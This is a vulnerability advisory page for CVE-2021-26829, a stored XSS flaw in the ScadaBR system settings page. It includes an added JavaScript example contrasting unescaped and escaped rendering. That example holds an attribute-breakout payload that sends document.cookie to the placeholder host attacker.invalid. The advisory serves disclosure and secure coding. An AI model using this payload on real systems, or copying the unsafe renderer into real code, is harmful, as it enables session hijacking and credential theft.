CVE-2021-26829
In short
OpenPLC ScadaBR has a stored cross-site scripting (XSS) vulnerability in its system settings page. An attacker can inject malicious scripts that get saved and executed when other users view the settings, potentially stealing their credentials or session data.
Technical detail
Stored XSS vulnerability in system_settings.shtm allows an authenticated attacker with low privileges (CVSS PR:L) to submit a settings value containing arbitrary JavaScript that the application saves server-side and later writes back into the page without output encoding. When an administrator or any other user views the affected page (user interaction is required, UI:R), the injected script executes in that user's browser context with the application's origin, enabling session hijacking, credential theft, or further compromise of the SCADA system through actions performed with the victim's privileges.
Summary generated and translated by AI from the official description.
OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows stored XSS via system_settings.shtm.
CVSS v3.1 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (base score 5.4, Medium)
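The following is an added illustration, not code from ScadaBR or OpenPLC, of how a stored XSS of the kind described above arises in a settings page and how context-aware output encoding closes it. The settings store, field name, renderer functions and the payload are all hypothetical; the payload is constructed for the example and only shows the shape of an attribute-breakout, not anything taken from the advisory.

```javascript
// Added example (not ScadaBR code): a stored XSS in a settings page and
// its fix. All names and the settings field are hypothetical.

// Minimal HTML entity encoder for text placed in element content or in a
// double-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Hypothetical server-side store standing in for the persisted settings of
// a web application; a low-privileged user can write to it.
const settingsStore = new Map();

function saveSetting(name, value) {
  // Stored as-is: storage itself is not the bug, the rendering is.
  settingsStore.set(name, value);
}

// Vulnerable rendering: the stored value is concatenated into HTML
// unescaped, so the browser parses it as markup every time any user
// loads the page.
function renderSettingsPageUnsafe() {
  let html = '<form>';
  for (const [name, value] of settingsStore) {
    html += `<label>${name}</label><input name="${name}" value="${value}">`;
  }
  return html + '</form>';
}

// Fixed rendering: each stored value is encoded for the context it lands
// in (here an attribute value), so the quote cannot close the attribute.
function renderSettingsPageSafe() {
  let html = '<form>';
  for (const [name, value] of settingsStore) {
    html += `<label>${escapeHtml(name)}</label>` +
      `<input name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
  }
  return html + '</form>';
}

// Constructed payload: closes the value attribute and adds an event
// handler. attacker.invalid is a reserved, non-resolving placeholder host.
const PAYLOAD =
  '" autofocus onfocus="fetch(\'https://attacker.invalid/?c=\'+document.cookie)';

// Canary check for this payload: an onfocus= attribute that starts a new
// quoted value means the injected string became live HTML.
function containsLiveHandler(html) {
  return /\sonfocus="/i.test(html);
}

// Store the payload once and render it both ways.
function demo() {
  saveSetting('instanceDescription', PAYLOAD);
  return {
    unsafe: renderSettingsPageUnsafe(),
    safe: renderSettingsPageSafe(),
  };
}

const out = demo();
console.log('unsafe:', out.unsafe);
console.log('safe:  ', out.safe);
```

In the unsafe output the stored value yields `value="" autofocus onfocus="fetch(...)">`, which fires as soon as the page loads for whoever views it; in the safe output the same string survives as `&quot; autofocus onfocus=&quot;...` inside the attribute and is shown as text. The same encoding has to be applied wherever the stored value is written back, including any JSON or inline script blocks, which need their own context-specific encoding rather than HTML entities.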
Affected products
n/a · n/a
References
http://forum.scadabr.com.br/t/report-falhas-de-seguranca-em-versoes-do-scadabr/3615/4
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26829
https://www.forescout.com/blog/anatomy-of-a-hacktivist-attack-russian-aligned-group-targets-otics/
https://youtu.be/Xh6LPCiLMa8